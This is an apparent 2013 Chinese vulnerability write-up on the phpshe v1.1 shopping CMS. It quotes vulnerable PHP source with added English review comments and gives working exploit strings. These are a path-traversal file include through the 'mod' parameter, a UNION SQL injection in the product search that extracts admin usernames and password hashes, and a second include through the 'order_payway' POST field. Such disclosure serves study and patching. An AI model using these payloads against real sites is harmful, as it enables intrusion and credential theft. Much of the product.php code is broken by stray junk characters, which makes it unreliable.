
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输:
//common.php
// Flatten the request into prefixed globals: $_g_* (GET), $_p_* (POST),
// $_s_* (session) and $_c_* (cookie). When magic_quotes_gpc is on, GET/POST
// are first passed through pe_stripslashes() (presumably undoing the added
// slashes); cookies are always unslashed.
// Nothing here escapes for SQL or file paths: every $_g_*/$_p_*/$_c_* value is
// request-controlled, so any later query or include() that interpolates one of
// them (e.g. the product list `keyword`, the index `mod`) must escape or
// whitelist it itself.
if (get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
    }
} else {
    if (!empty($_GET)) {
        extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
    }
}

session_start();

if (!empty($_SESSION)) {
    extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
}
if (!empty($_COOKIE)) {
    extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
}

0×01 包含漏洞
//首页文件
<?php
include('common.php');

// Cached site data read on every front-page request.
$cache_category     = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class        = cache::get('class');
$cache_ad           = cache::get('ad');
$cache_link         = cache::get('link');
$cache_page         = cache::get('page');

// Customer-service QQ numbers are stored as a comma-separated setting
// ($cache_setting is presumably populated by common.php — not visible here).
$web_qq = $cache_setting['web_qq']['setting_value']
    ? explode(',', $cache_setting['web_qq']['setting_value'])
    : array();

// Cart badge: logged-in users are counted from the database, guests from the
// serialised cart cookie. NOTE(review): unserialize() runs on the raw
// $_c_cart_list cookie value, i.e. bytes chosen by the client; a JSON or
// integrity-checked encoding would be the safe replacement.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id' => $_s_user_id));
} else {
    $cart_num = unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0;
}

// Dispatch to module/<module>/<mod>.php. $mod is taken straight from the
// request by the common.php routing and is not whitelisted, which is the
// file-include issue this write-up describes; checking $mod against the
// installed module file names before this include would close it.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
//url路由配置
// Route resolution: start from the 'index' defaults, then let POST override
// GET override the default (the first truthy value wins, so '0' or '' fall
// through). $id has no default of its own, so with neither request array
// carrying an id the fallback reads an undefined variable.
// These three values are consumed raw by later code (index.php includes
// "module/{$module}/{$mod}.php"); $mod and $act should be matched against a
// fixed list of module/action names and $id cast to int before use.
$module = $mod = $act = 'index';

$mod = $_POST['mod'] ?: ($_GET['mod'] ?: $mod);
$act = $_POST['act'] ?: ($_GET['act'] ?: $act);
$id  = $_POST['id']  ?: ($_GET['id']  ?: $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
0×02 搜索注入

<code id="code2">

//product.php文件' g5 D! N5 u" W% p
case 'list':
1 W3 ~1 n1 i3 S# N! ]$category_id = intval($id);
" L3 R4 w. }2 N1 Q0 o( L* C( p$info = $db->pe_select('category', array('category_id'=>$category_id));& }) j: d# M; s
//搜索3 b' E; V/ M5 P9 W' p
$sqlwhere = " and `product_state` = 1";
! R$ F& D2 Z3 S4 d) Mpe_lead('hook/category.hook.php');
( R# i/ ~7 l$ J+ Z# c1 e3 a- S% {if ($category_id) {" _' ^6 T6 C2 Q$ T# t  w- ~
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
0 e" S4 q" {8 |& h# J3 x$ a/ F}  t! s" ^9 R2 }: M0 {
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤( T: i) e- w, w! Q- A
if ($_g_orderby) {& S6 p- M# }  N" J$ Y7 K/ q6 z
$orderby = explode('_', $_g_orderby);
) O" u, F  f* u. L3 g# m$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
2 a/ h6 h+ Y' j+ v0 m0 b}5 q$ M% B$ Z8 c
else {
, a% B4 w3 }) W$sqlwhere .= " order by `product_id` desc";3 ?3 ^# j1 M4 p/ _5 l5 a. z
}
5 _2 A& [' S# {: B$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));. j9 B- T- m; ^2 M% N! D" ^) [
//热卖排行
0 X& D+ ?, K8 M/ P2 i$product_hotlist = product_hotlist();1 f& E1 {& s! X6 x0 D4 B5 |5 N' o
//当前路径( w5 h' ^( J" `4 s7 B, }
$nowpath = category_path($category_id);
# {3 o) I1 O8 `) @6 f6 i+ q; _$seo = pe_seo($info['category_name']);
) L! N3 l& ^/ m3 \0 R% z4 x2 @include(pe_tpl('product_list.html'));
//跟进 pe_selectall 函数库
/**
 * Select every row of $table that matches $where.
 *
 * @param string       $table      table name without the `dbpre` prefix; interpolated into the SQL as-is
 * @param array|string $where      condition handed to _dowhere(); its result is spliced into the query.
 *                                 The product list passes a hand-built string, so strings presumably
 *                                 pass through unchanged — confirm in _dowhere()
 * @param string       $field      column list, interpolated verbatim
 * @param array        $limit_page paging tuple forwarded to sql_selectall()
 *
 * Nothing in this method escapes $table, $field or a string $where. Request
 * values a caller interpolates into $where (e.g. the product list's `keyword`)
 * therefore reach the database unchanged, which is the injection this
 * write-up documents; callers must escape or parameterise such values before
 * building the clause.
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    $clause = $this->_dowhere($where);
    $sql = 'select ' . $field . ' from `' . dbpre . $table . '` ' . $clause;

    return $this->sql_selectall($sql, $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>
0×03 包含漏洞2
<code id="code3">

//order.php

case 'pay':

- J2 ?. f! Q6 k8 l( V! S# l$ I$ |
$order_id = pe_dbhold($_g_id);

* h' U* I! E" i  g# z6 d1 J& V6 E
$cache_payway = cache::get('payway');

+ j7 K3 g. e/ R) D3 f1 h
foreach($cache_payway as $k => $v) {

/ t! u( u! k: {# `9 M
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


5 I+ q4 U7 q& D% y% C9 K( Oif ($k == 'bank') {

, V3 @6 y( Z1 ?2 r' o2 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

; D$ t( p+ z0 L3 F, b& ^, m
}


/ K7 q) q& \" Z- x}


0 G: T) w+ j; d6 C4 z* {+ g. w- Z" J$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


) X% l/ c' S# T0 K% [: R, L6 G!$order['order_id'] && pe_error('订单号错误...');


* C$ z9 D8 e' m1 a- n7 dif (isset($_p_pesubmit)) {

9 q/ ^6 L! }/ V' i6 j( A5 ~+ R) x
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

9 n8 A! U5 h" W$ l
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

1 m) A* F) M( I
foreach ($info_list as $v) {


0 h6 G# u. h+ q8 e, i$order['order_name'] .= "{$v['product_name']};";
& S- ]8 p- m8 L% r$ l0 U) S

9 Q; ]. o6 _/ y6 B9 S& u
}


8 }7 C, a4 x, Y7 D+ s/ Q. s% yecho '正在为您连接支付网站,请稍后...';


2 I; y  ~% `& f  u; [include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

% D4 j& l0 A6 H2 g7 T% U
}//当一切准备好的时候就可以进行"鸡肋包含了"

# T. _" }; A' S' X
else {


8 z2 Z5 l3 k: rpe_error('支付错误...');

% X$ R. F4 z0 m* r8 J
}

( {8 J9 r1 Y1 S% B, m
}

" l+ K5 Q4 L9 s! Y" H
$seo = pe_seo('选择支付方式');


' t" ]9 T, Q+ f/ _, yinclude(pe_tpl('order_pay.html'));

* J* W  A" }2 w: ]2 n
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
